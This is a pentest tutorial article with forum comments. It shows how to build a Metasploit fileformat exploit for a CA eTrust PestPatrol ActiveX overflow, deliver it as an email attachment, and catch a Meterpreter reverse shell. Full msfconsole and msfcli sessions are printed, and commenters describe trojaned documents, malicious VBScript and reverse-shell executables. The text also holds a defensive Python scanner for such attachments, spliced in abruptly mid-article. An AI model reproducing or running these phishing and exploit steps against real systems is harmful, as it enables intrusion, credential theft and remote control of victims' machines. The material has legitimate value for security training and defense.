Video: Client-Sides, Social Engineering and Metasploit, Oh My!


It should be obvious to everyone that the bad guys are moving away from network-level attacks and toward social engineering coupled with client-side attacks. In fact, this is the focus of the next ChicagoCon in May, where I will be presenting this exact topic live. Penetration testers need to be able to help an organization detect and respond to client-side attacks, and what better way to do that than to do a little client-side exploitation during your pentests.

A new mixin has been added to the Metasploit Framework that allows the penetration tester to create and output the files that contain the exploit code instead of just serving up the exploit on a web page. This increases the attack surface by allowing the pentester to perform their Open Source Intelligence (OSINT) gathering to collect email addresses for the target domain. We then take those addresses and actually send the exploit to the victim as an attachment in the email rather than a link to a website. Your mileage may vary on the effectiveness of that technique, but in my experience people seem to be more apt to open attachments of a “normal” or “non-malicious” type like .pdf and .html than to click on links. Some example formats that can be used with the fileformat mixin are .pdf, .html, .cab, .m3u and .xpm, as well as others.

**This isn’t to say that some fileformat exploits can’t be delivered via the web. You can easily link to www.evil.com/evil.pdf, but some lend themselves to easier exploitation if you can get the file into a user’s inbox. So let’s take a quick look at how this can be accomplished.

For our example we’ll use a vulnerability in the ActiveX control for eTrust PestScan. Because this control is not marked safe for scripting, it won’t run if a user browses to the page in the Internet zone. But if they open a .html file that calls the vulnerable control, we can execute code.

http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb

From the description in the module:

“This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.”
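A defensive check for the delivery pattern described above, added here as an example (it is not code from the article or from the Metasploit module): it parses an HTML attachment, lists any ActiveX control instantiated by CLSID, the methods inline script calls on it, and whether the script builds a buffer large enough to suggest an overflow attempt. The CLSID in the constructed sample is a placeholder and the 1024-byte threshold is an assumption.

```python
import re
from html.parser import HTMLParser

# Assumed threshold for this example: a buffer at least this long handed to a
# control method is reported as a possible overflow attempt.
LONG_BUFFER = 1024

class ActiveXCollector(HTMLParser):
    """Collect <object> tags instantiated by CLSID plus the page's inline scripts."""
    def __init__(self):
        super().__init__()
        self.controls = {}      # element id -> CLSID (lower-case, braces stripped)
        self.scripts = []       # one string per <script> element
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "object" and (a.get("classid") or "").lower().startswith("clsid:"):
            ident = a.get("id") or "obj%d" % len(self.controls)
            self.controls[ident] = a["classid"].lower()[6:].strip("{} ")
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def longest_buffer(script):
    """Largest buffer the script could build: the longest string literal, or the
    bound in fill idioms such as 'while (s.length < N)' and 'Array(N)'."""
    sizes = [len(s) - 2 for s in re.findall(r'"[^"\n]*"|\'[^\'\n]*\'', script)]
    for m in re.finditer(r'\.length\s*<=?\s*(\d+)|\bArray\s*\(\s*(\d+)', script):
        sizes.append(int(m.group(1) or m.group(2)))
    return max(sizes, default=0)

def scan_html(html):
    """One finding per ActiveX control the attachment instantiates by CLSID."""
    p = ActiveXCollector()
    p.feed(html)
    script = "\n".join(p.scripts)
    oversized = longest_buffer(script) >= LONG_BUFFER
    findings = []
    for ident, clsid in p.controls.items():
        calls = re.findall(r'\b%s\s*\.\s*(\w+)\s*\(' % re.escape(ident), script)
        findings.append({"id": ident, "clsid": clsid, "methods": sorted(set(calls)),
                         "oversized_arg": bool(calls) and oversized})
    return findings

# Constructed sample attachment; the CLSID is a placeholder, not the real control's.
SUSPICIOUS_HTML = """<html><body>
<object id="ctl" classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script>var buf = ""; while (buf.length < 4096) { buf += "A"; } ctl.Initialize(buf);
</script></body></html>"""
BENIGN_HTML = "<html><body><p>Report attached.</p><script>var x = 1;</script></body></html>"
```

Run scan_html() over each HTML attachment at the gateway or during triage; a non-empty result with oversized_arg set is the case to quarantine for analyst review.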

Example Time!

msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info

       Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
    Version: $Revision:$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License

Provided by:
  MC

Available targets:
  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  MSF              no        The file name.

Payload information:
  Space: 1024
  Avoid: 1 characters

Description:
  This module exploits a stack overflow in CA eTrust PestPatrol. When
  sending an overly long string to the Initialize() property of
  ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
  code. This control is not marked safe for scripting, so choose your
  attack vector accordingly.

References:
  http://www.w00t-shell.net/#
  http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm

msf exploit(etrust_pestscan) > show options

Module options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  MSF              no        The file name.

Exploit target:
  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options

Module options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  DEMO.html        no        The file name.

Payload options (windows/meterpreter/reverse_tcp):
  Name      Current Setting                                 Required  Description
  ----      ---------------                                 --------  -----------
  DLL       /home/cg/evil/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
  EXITFUNC  process                                         yes       Exit technique: seh, thread, process
  LHOST     192.168.0.101                                   yes       The local address
  LPORT     4444                                            yes       The local port

Exploit target:
  Id  Name
  --  ----
  0   Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >

Fileformat bugs require you to run multi/handler so you can catch the returning shells.

cg@attack:~/evil/msf3$ ./msfcli
Usage: ./msfcli <exploit_name> <option=value> [mode]
====================================================

  Mode           Description
  ----           -----------
  (H)elp         You're looking at it baby!
  (S)ummary      Show information about this module
  (O)ptions      Show available options for this module
  (A)dvanced     Show available advanced options for this module
  (I)DS Evasion  Show available ids evasion options for this module
  (P)ayloads     Show available payloads for this module
  (T)argets      Show available targets for this exploit module
  (AC)tions      Show available actions for this auxiliary module
  (C)heck        Run the check routine of the selected module
  (E)xecute      Execute the selected module

cg@attack:~/evil/msf3$ ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...

Or ...

./msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.101
msf exploit(handler) > set LPORT 4444

*** This is where you or another member of your pen testing team would work their social engineering magic to get the client to open the HTML file.

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)

meterpreter >

And now on to the video (another example of malicious PDFs in action) ...

Video is in the process of moving to our YouTube Channel

Conclusion

With a combination of user interaction and the power of Metasploit, we were able to grab password hashes. From there, a jolt of Ophcrack, some rainbow tables, or some pass-the-hash action and we’re off to completing our network pen test goals. This is a perfect example of electronically assisted social engineering, and of how it can be a very effective addition to your toolset.

Extra Resources

Fileformat exploit videolan_tivo.rb, Metasploit on BackTrack: http://vimeo.com/2419131 (**hard to see)

Author Bio

Chris Gates, Sr Security Engineer, has been breaking things professionally for over a decade via Network & Web Application Penetration Testing, Red Teaming & Adversarial Simulation. These days Chris splits his time being both a breaker and fixer. Chris is the author of Metta, a tool for adversarial simulation, and contributes to other open source projects. In the past he has spoken at the United States Military Academy, BlackHat, DefCon, Wild West Hacking Fest, Toorcon, Brucon, Troopers, SOURCE Boston, Derbycon, LasCon, HashDays, HackCon, Bsides ATL, IT Defense, OWASP AppSec DC, and Devops Days. Chris is also a cofounder of NoVAHackers. Blog: carnal0wnage.attackresearch.com Twitter: @carnal0wnage Talks: https://www.slideshare.net/chrisgates/

All Articles by Chris Gates

This topic contains 23 replies, has 7 voices, and was last updated by  KrisTeason 10 years, 4 months ago.

  • #3276
     Don Donzal 
    Keymaster

    More hacking goodness from Mr. Gates!!

    Permanent link: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

    By Chris Gates, CISSP, GCIH, C|EH, CPTS

    Don

  • #21738
     apollo 
    Participant

    Great examples and video 🙂  I was playing with this stuff the other day with the office macros in Metasploit.  It seemed to be quite effective.  It’s amazing what folks will click on with a good backstory.

  • #21739
     RoleReversal 
    Participant

    Nice work Chris, thanks 😀

    (looks like the vimeo link has gone walkies though…)

  • #21740
     KrisTeason 
    Participant

    Like your other videos as well as this one, I’ve got to say nice work. It’s a good thing Metasploit has broadened its horizons and incorporated the use of fileformat exploits. I’d sure like your trunk by the way, 327 Exploits I only have 288 (I think…)

  • #21741
     Anonymous 
    Participant

    thanks guys!

    I’ll be releasing a few more client-side/fileformat videos in March as part of my client-side talk at SOURCE Boston. I’ll make sure I post on EH.net when I do.

  • #21742
     mtgarden 
    Participant

    Is it possible for metasploit to tie this to a current PDF?  In other words, can I use a pdf I have and add this exploit onto it?  At least, where would I start looking for that information?

  • #21743
     KrisTeason 
    Participant

    You mean like binding the PDF with an existing PDF? I’m thinking that you can, but what would be the point, once the malicious pdf opens, doesn’t it just freeze up anyway?

  • #21744
     mtgarden 
    Participant

    Not sure.  Was in the process of setting up a test environment to explore this threat vector.

  • #21745
     Anonymous 
    Participant

    @mtgarden wrote:

    Is it possible for metasploit to tie this to a current PDF?  In other words, can I use a pdf I have and add this exploit onto it?  At least, where would I start looking for that information?

    Not currently, that I am aware of.

  • #21746
     mtgarden 
    Participant

    Thanks. I was testing this for a presentation but Symantec actually catches it. So, I am trying the vbscript attack.

    Sadly, there is a quirk with either Metasploit or BT3. Not sure which yet. When I run the /msfcli multi/handler PAYLOAD= LHOST= etc…, it runs the exploit and binds to IP=0.0.0.0 which is less than helpful.

    Heh, I guess there was no reason to assume this would be that easy.  ;D

  • #21747
     Anonymous 
    Participant

    Make sure that the IP you’re listening on is the one you add as LHOST and is actually active.

    for example:

    msf exploit(handler) > set LHOST 192.168.1.1
    LHOST => 192.168.1.1
    msf exploit(handler) > exploit

    [*] Handler binding to LHOST 192.168.1.1
    [-] Bind failed on 192.168.1.1
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler…
    ^C[-] Exploit failed:
    [*] Exploit completed, but no session was created.
    msf exploit(handler) > set LHOST 10.10.10.15
    LHOST => 10.10.10.15
    msf exploit(handler) > exploit

    [*] Handler binding to LHOST 10.10.10.15
    [*] Started reverse handler
    [*] Starting the payload handler…

    tested with 3.3-dev

  • #21748
     mtgarden 
    Participant

    Well, my VM has an IP of 192.168.1.1.  So I added LHOST=192.168.1.1 to the exploit.

    Then when running ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.1 DisableCourtesyShell=True E

    It doesn’t give me a “bind failed” error, it just binds to 0.0.0.0.

    This happens in a BT3 VM and on a BT3 laptop install.  Would I look for the error/problem in BT3 or in Metasploit 3.2?

  • #21749
     KrisTeason 
    Participant

    Mine also binds to 0.0.0.0, but when testing this out I created a malicious .exe using msfpayload. This was going to be a reverse meterpreter .exe that would shovel back a shell to a port on my box. So I set my LHOST similar to you when using exploit/multi/multi_handler and keyed exploit on my msfconsole; it said 0.0.0.0, however once I executed my .exe I received my reverse shell.

  • #21750
     mtgarden 
    Participant

    OK.  Then the problem lies in my malicious VB script.  Will have to figure out how to fix that one.

    Thanks.

  • #21751
     Don Donzal 
    Keymaster

    Submitted to digg. Click the link below and vote:

    http://digg.com/security/Video_Client_Sides_Social_Engineering_Metasploit_Oh_My

    Please help spread the word,
    Don

  • #21752
     mtgarden 
    Participant

    OK.  Solved my issues.  Well some of them anyway…. ::)

    My setup was this: BT3 VM with bridged networking.  The trojaned .doc file was executed on the host Office suite.  That failed.  But, if I operated the exploit from a foreign system, it worked fine.

    In fact it worked so well, I demoed it in a security presentation.  Scared some users (as well it should).  Very cool.

    Anyone know where I can read up on these less well documented exploit techniques?  This isn’t in the default manual.

    Thanks.

  • #21753
     Anonymous 
    Participant

    this looked to be the best place for this.

    Just added a module for ms09_002 to the MSF trunk. enjoy.

    http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ms09_002_memory_corruption.rb

    /dean

  • #21754
     Feras 
    Participant

    This exploit works on my B|T4 but on Windows!

    C:\Program Files\Metasploit\Framework3\msf32\msf32\modules\exploits\windows\browser

    add the exploit name ms09_002_memory_corruption.rb

    msf > use exploit/windows/browser/ms09_002_memory_corruption
    [-] Failed to load module: exploit/windows/browser/ms09_002_memory_corruption

    I’m sure about the local … and it’s not included when I show the exploits in my msf .. :-/

    Any idea?

  • #21755
     mtgarden 
    Participant

    Bite the bullet and switch to Linux. I’m not sure why Moore and company waste time on the Windows version as it is just a shadow of the msfconsole. Generally, when that stuff happened on Windows, I uninstalled and reinstalled and it would fix it.

  • #21756
     Feras 
    Participant

    LOL, buddy, it’s not about moving from Windows to Linux .. I’m a Linuxer but sometimes some tools won’t work on Linux .. otherwise I like to use Windows sometimes ..

    and without Windows you won’t be here 😉 it’s start the shadow ..

    but anyway your way to fix errors is not right .. you need to figure out what’s the problem then fix it …

    Any idea?

  • #21757
     mtgarden 
    Participant

    Did you try uninstalling and reinstalling?  When the MS08_067 exploit arrived, the update function would not pull everything properly.  Or it wasn’t registering things correctly.  This happened to several friends.  The fastest fix I found was to uninstall and reinstall the app.

    And sorry, didn’t mean to sound mean about the Windows thing. I just gave up the Windows version the other day. I tried to make it work until I wanted to practice backgrounding a session and routing through it. It just doesn’t work properly in Windows. That’s all. I have found the Windows interface to be buggy.

  • #21758
     Feras 
    Participant

    You’re right, but did you think Moore made all this for Windows and after that we should reinstall it and install it again ..

    Anyway I am going now to google it more and more till I find some way …

    In the end I’ll try your help ..

    Thanks a lot buddy!

  • #21759
     Feras 
    Participant

    It looks like some error from the Metasploit certificate …

    Updating the Metasploit Framework...
    Error validating server certificate for 'https://metasploit.com:443':
    - The certificate is not issued by a trusted authority. Use the
    fingerprint to validate the certificate manually!
    Certificate information:
    - Hostname: metasploit.com
    - Valid: from Mon, 02 Apr 2007 06:02:24 GMT until Fri, 02 Apr 2010 06:02:24 GMT
    - Issuer: 07969287, http://certificates.godaddy.com/repository, GoDaddy.com, Inc., Scottsdale, Arizona, US
    - Fingerprint: 20:a7:2e:df:6d:53:10:6c:dc:2a:ca:33:fd:35:76:2c:0e:62:b1:4d
    (R)eject, accept (t)emporarily or accept (p)ermanently? yes
    svn: OPTIONS of 'https://metasploit.com/svn/framework3/branches/framework-3.2':
    Server certificate verification failed: issuer is not trusted (https://metasploit.com)
    Press any key to continue . . .

  • #21760
     KrisTeason 
    Participant

    It’s prompting you to type in r, t or p & you typed in yes; attempt t next time and let us know.
